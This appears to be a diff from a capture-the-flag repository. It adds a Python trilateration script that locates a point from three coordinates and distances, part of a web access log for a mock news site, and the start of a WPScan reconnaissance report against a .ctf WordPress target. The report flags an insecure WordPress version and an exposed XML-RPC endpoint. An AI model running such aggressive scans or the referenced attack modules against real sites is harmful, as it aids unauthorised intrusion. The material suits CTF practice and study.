[23/Jul/2020:12:02:17 -0500] "GET /sports-contest-of-students-of-schools-of-orphans-held/ HTTP/1.1" 200 2195 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +81.210.77.106 - - [23/Jul/2020:12:02:18 -0500] "GET /en/north-korean-military-developing-parade-capable-of-traveling-5000-miles/ HTTP/1.0" 200 10536 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +5.203.255.122 - - [23/Jul/2020:12:02:22 -0500] "GET /en/dprk-figure-skaters-prove-successful-in-asian-cup-tournament/ HTTP/1.1" 200 3355 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)" +90.77.206.249 - - [23/Jul/2020:12:02:26 -0500] "POST /en/us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.1" 200 11095 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0" +186.218.86.190 - - [23/Jul/2020:12:02:28 -0500] "GET /tele-mushroom-cultivation-technology-dissemination-system-developed-in-dprk/ HTTP/1.0" 200 12894 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0" +192.168.51.66 - - [23/Jul/2020:12:02:30 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +236.212.102.145 - - [23/Jul/2020:12:02:31 -0500] "GET /2016-spring-table-tennis-tournament-for-disabled-and-amateurs/ HTTP/1.0" 200 12517 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +177.83.229.86 - - [23/Jul/2020:12:02:35 -0500] "POST /en/kim-jong-un-gives-field-guidance-to-pyongyang-hosiery-factory/ HTTP/1.1" 200 12781 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" +77.35.253.29 - - [23/Jul/2020:12:02:37 -0500] "POST /3rd-national-conference-of-financial-and-banking-officials-held/ HTTP/1.1" 200 6894 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/6.1.4 Safari/537.76.4" +160.207.20.143 - - [23/Jul/2020:12:02:40 -0500] "POST / HTTP/1.1" 200 3810 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4" +251.84.198.231 - - [23/Jul/2020:12:02:43 -0500] "GET /en/art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.1" 500 11243 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53" +128.236.163.119 - - [23/Jul/2020:12:02:45 -0500] "GET /kim-jong-un-visits-taedonggang-pig-farm/ HTTP/1.0" 200 4882 "http://www.yahoo.ctf" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" +153.215.159.49 - - [23/Jul/2020:12:02:49 -0500] "GET /en/north-kiringul-air-force/ HTTP/1.1" 400 14328 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0" +22.143.186.148 - - [23/Jul/2020:12:02:50 -0500] "GET / HTTP/1.1" 200 4013 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +37.155.164.64 - - [23/Jul/2020:12:02:54 -0500] "POST /stem-cell-implantation-widely-introduced-in-dprk/ HTTP/1.1" 400 4910 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0" +87.10.124.240 - - [23/Jul/2020:12:02:56 -0500] "GET /greetings-to-kim-jong-un-from-v-putin/ HTTP/1.1" 200 10107 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0) Gecko/20100101 Firefox/29.0" diff --git a/Kaizen/MissileDestroyer/latlong.py b/Kaizen/MissileDestroyer/latlong.py new file mode 100644 index 0000000..cb9492f --- /dev/null +++ b/Kaizen/MissileDestroyer/latlong.py @@ -0,0 +1,64 @@ +import math +import numpy + +#assuming elevation = 0 +earthR = 6371 +LatA = 39.271767 +LonA = 127.625128 +DistA = 162.623428186 +LatB = 39.269915 +LonB = 124.718869 +DistB = 93.4176300725 +LatC = 36.964578 +LonC = 125.817776 +DistC = 231.192257372 + + +#using authalic sphere +#if using an ellipsoid this step is slightly different +#Convert geodetic Lat/Long to ECEF xyz +# 1. Convert Lat/Long to radians +# 2. Convert Lat/Long(radians) to ECEF +xA = earthR *(math.cos(math.radians(LatA)) * math.cos(math.radians(LonA))) +yA = earthR *(math.cos(math.radians(LatA)) * math.sin(math.radians(LonA))) +zA = earthR *(math.sin(math.radians(LatA))) + +xB = earthR *(math.cos(math.radians(LatB)) * math.cos(math.radians(LonB))) +yB = earthR *(math.cos(math.radians(LatB)) * math.sin(math.radians(LonB))) +zB = earthR *(math.sin(math.radians(LatB))) + +xC = earthR *(math.cos(math.radians(LatC)) * math.cos(math.radians(LonC))) +yC = earthR *(math.cos(math.radians(LatC)) * math.sin(math.radians(LonC))) +zC = earthR *(math.sin(math.radians(LatC))) + +P1 = numpy.array([xA, yA, zA]) +P2 = numpy.array([xB, yB, zB]) +P3 = numpy.array([xC, yC, zC]) + +#from wikipedia +#transform to get circle 1 at origin +#transform to get circle 2 on x axis +ex = (P2 - P1)/(numpy.linalg.norm(P2 - P1)) +i = numpy.dot(ex, P3 - P1) +ey = (P3 - P1 - i*ex)/(numpy.linalg.norm(P3 - P1 - i*ex)) +ez = numpy.cross(ex,ey) +d = numpy.linalg.norm(P2 - P1) +j = numpy.dot(ey, P3 - P1) + +#from wikipedia +#plug and chug using above values +x = (pow(DistA,2) - pow(DistB,2) + pow(d,2))/(2*d) +y = ((pow(DistA,2) - pow(DistC,2) + pow(i,2) + pow(j,2))/(2*j)) - ((i/j)*x) + +# only one case shown here +z = numpy.sqrt(pow(DistA,2) - pow(x,2) - pow(y,2)) + +#triPt is an array with ECEF x,y,z of trilateration point +triPt = P1 + x*ex + y*ey + z*ez + +#convert back to lat/long from ECEF +#convert to degrees +lat = math.degrees(math.asin(triPt[2] / earthR)) +lon = math.degrees(math.atan2(triPt[1],triPt[0])) + +print lat, lon \ No newline at end of file diff --git a/Kaizen/MissileDestroyer/wpscan.txt b/Kaizen/MissileDestroyer/wpscan.txt new file mode 100644 index 0000000..f4c5f20 --- /dev/null +++ b/Kaizen/MissileDestroyer/wpscan.txt @@ -0,0 +1,666 @@ +% wpscan --url http://www.nkcna.ctf/ -e vp --plugins-detection aggressive --api-token TOKEN +_______________________________________________________________ + __ _______ _____ + \ \ / / __ \ / ____| + \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® + \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ + \ /\ / | | ____) | (__| (_| | | | | + \/ \/ |_| |_____/ \___|\__,_|_| |_| + + WordPress Security Scanner by the WPScan Team + Version 3.8.1 + Sponsored by Automattic - https://automattic.com/ + @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart +_______________________________________________________________ + +[+] URL: http://www.nkcna.ctf/ [172.25.45.92] +[+] Started: Thu Jul 23 10:29:06 2020 + +Interesting Finding(s): + +[+] Headers + | Interesting Entry: Server: Apache/2.4.18 (Ubuntu) + | Found By: Headers (Passive Detection) + | Confidence: 100% + +[+] http://www.nkcna.ctf/robots.txt + | Interesting Entries: + | - /wp-admin/ + | - /wp-admin/admin-ajax.php + | Found By: Robots Txt (Aggressive Detection) + | Confidence: 100% + +[+] XML-RPC seems to be enabled: http://www.nkcna.ctf/xmlrpc.php + | Found By: Link Tag (Passive Detection) + | Confidence: 100% + | Confirmed By: Direct Access (Aggressive Detection), 100% confidence + | References: + | - http://codex.wordpress.org/XML-RPC_Pingback_API + | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner + | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos + | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login + | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access + +[+] http://www.nkcna.ctf/readme.html + | Found By: Direct Access (Aggressive Detection) + | Confidence: 100% + +[+] The external WP-Cron seems to be enabled: http://www.nkcna.ctf/wp-cron.php + | Found By: Direct Access (Aggressive Detection) + | Confidence: 60% + | References: + | - https://www.iplocation.net/defend-wordpress-from-ddos + | - https://github.com/wpscanteam/wpscan/issues/1299 + +[+] WordPress version 4.7.2 identified (Insecure, released on 2017-01-26). + | Found By: Rss Generator (Passive Detection) + | - http://www.nkcna.ctf/feed/,